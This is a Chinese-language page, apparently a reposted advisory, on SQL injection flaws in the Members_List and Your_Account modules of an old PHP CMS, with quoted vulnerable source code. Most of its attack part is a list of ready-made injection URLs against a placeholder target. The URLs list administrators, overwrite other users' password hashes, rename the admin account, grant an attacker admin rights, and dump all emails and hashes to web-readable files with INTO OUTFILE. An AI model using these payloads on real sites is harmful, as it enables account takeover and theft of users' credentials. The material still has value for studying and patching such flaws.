| 关键词: nbsp user userinfo uname uid modules name pass where prefix |
涉及程序: SQL 6.0 描述: SQL注入缺陷使用方法及代码 详细: SQL的Members_List、Your_Account模块中存在注入缺陷。如果magic_quotes_gpc选项为“OFF”,攻击者使用下列攻击方法及代码能利用该缺陷:PHP代码/位置:?/modules/Members_List/index.php :------------------------------------------------------------------------[...]$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";$select = "select uid, name, uname, femail, url from ".$user_prefix."_users ";$where = "where uname != Anonymous ";if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {$where .= "AND uname like ".$letter."% ";} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {$where .= "AND uname REGEXP \"^\[1-9]\" ";} else {$where .= "";}$sort = "order by $sortby";$limit = " ASC LIMIT ".$min.", ".$max;$count_result = sql_query($count.$where, $dbi);$num_rows_per_order = mysql_result($count_result,0,0);$result = sql_query($select.$where.$sort.$limit, $dbi) or die();echo "";if ( $letter != "front" ) {echo "cellspacing=\"1\">\n";echo "color=\"$textcolor2\">"._NICKNAME."\n";echo "color=\"$textcolor2\">"._REALNAME."\n";echo "color=\"$textcolor2\">"._EMAIL."\n";echo "color=\"$textcolor2\">"._URL."\n";$cols = 4;[...]------------------------------------------------------------------------/modules/Your_Account/index.php :switch($op) {[...]case "mailpasswd":mail_password($uname, $code);break;case "userinfo":userinfo($uname, $bypass, $hid, $url);break;case "login":login($uname, $pass);break;[...]case "saveuser":saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);break;[...]case "savehome":savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson);break;case "savetheme":savetheme($uid, $theme);break;[...]case "savecomm":savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);break;[...]}------------------------------------------------------------------------/modules/Your_Account/index.php :[...]function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest, $user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if (!eregi("http://";, $url)) {$url = "http://$url";}if ((isset($pass)) && ("$pass" != "$vpass")) {echo ""._PASSDIFFERENT."";} elseif (($pass != "") && (strlen($pass) echo ""._YOUPASSMUSTBE." $minpass "._CHARLONG."";} else {if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio = FixQuotes($bio); }if ($pass != "") {Cookiedecode($user);sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);$pass = md5($pass);sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio , user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);$result = sql_query("select uid, uname, pass, storynum, umode, uorder, thold, noscore, ublockon, theme from ".$user_prefix."_users where uname=$uname and pass=$pass", $dbi);if(sql_num_rows($result, $dbi)==1) {$userinfo = sql_fetch_array($result, $dbi);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);} else {echo ""._SOMETHINGWRONG."";}sql_query("UNLOCK TABLES", $dbi);} else {sql_query("update ".$user_prefix."_users set name=$realname, email=$email, femail=$femail, url=$url, bio=$bio, user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ, user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig, user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm, newsletter=$newsletter where uid=$uid", $dbi);if ($attach) {$a = 1;} else {$a = 0;}}Header("Location: modules.php?name=$module_name");}}}[...]function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast, $popmeson) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if(isset($ublockon)) $ublockon=1; else $ublockon=0;$ublock = FixQuotes($ublock);sql_query("update ".$user_prefix."_users set storynum=$storynum, ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast, popmeson=$popmeson where uid=$uid", $dbi);getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name");}}function savetheme($uid, $theme) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {sql_query("update ".$user_prefix."_users set theme=$theme where uid=$uid", $dbi);getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name&theme=$theme");}}[...]function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax) {global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;Cookiedecode($user);$check = $Cookie[1];$check2 = $Cookie[2];$result = sql_query("select uid, pass from ".$user_prefix."_users where uname=$check", $dbi);list($vuid, $ccpass) = sql_fetch_row($result, $dbi);if (($uid == $vuid) AND ($check2 == $ccpass)) {if(isset($noscore)) $noscore=1; else $noscore=0;sql_query("update ".$user_prefix."_users set umode=$umode, uorder=$uorder, thold=$thold, noscore=$noscore, commentmax=$commentmax where uid=$uid", $dbi);getusrinfo($user);doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);Header("Location: modules.php?name=$module_name");}}[...]------------------------------------------------------------------------/modules/Your_Account/index.php :[...]function mail_password($uname, $code) {global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi, $module_name;$result = sql_query("select email, pass from ".$user_prefix."_users where (uname=$uname)", $dbi);if(!$result) {include("header.php");OpenTable();echo ""._SORRYNOUSERINFO."";CloseTable();include("footer.php");[...]------------------------------------------------------------------------------------------------------------------------------------------------[...]function userinfo($uname, $bypass=0, $hid=0, $url=0) {global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin, $broadcast_msg, $my_headlines, $module_name;$result = sql_query("select uid, femail, url, bio, user_avatar, user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest, user_sig, pass, newsletter from ".$user_prefix."_users where uname=$uname", $dbi);$userinfo = sql_fetch_array($result, $dbi);[...]------------------------------------------------------------------------------------------------------------------------------------------------[...]function login($uname, $pass) {global $setinfo, $user_prefix, $dbi, $module_name;$result = sql_query("select pass, uid, storynum, umode, uorder, thold, noscore, ublockon, theme, commentmax from ".$user_prefix."_users where uname=$uname", $dbi);$setinfo = sql_fetch_array($result, $dbi);[...]}[...]------------------------------------------------------------------------Members_List模块:- 显示用户:http://[target]/modules.php?name=Members_List&letter=All&sortby=pass- 显示用户:http://[target]/modules.php?name=Members_List&letter=All&sortby=uid- 显示moderators :http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=2/*- 显示管理员:http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=4/*- 显示所有以“abc”开头的用户 :http://[target]/modules.php?name=Members_List&letter=%20OR%20pass%20LIKE%20abc%25/*Your_Account模块 :- 将“Admind”用户更名为“Hophophop” :http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop%20where%20uname=Admin/*&uid=[OUR_UID]- 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=saveuser&email=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]- 将普通用户提升至管理员权限:http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID]或:http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID]- 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 :http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=)%20OR%201=1%20INTO%20OUTFILE%20/[path/to/site]/AllMailPass.txt/*利用Cookie发送crypted密码能访问用户帐户。- 将用户的所有信息保存在http://[target]/admintxt中:http://[target]/modules.php?name=Your_Account&op=login&uname=%20OR%user_level>1%20INTO%20OUTFILE%20/[path/to/site]/admin.txt[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|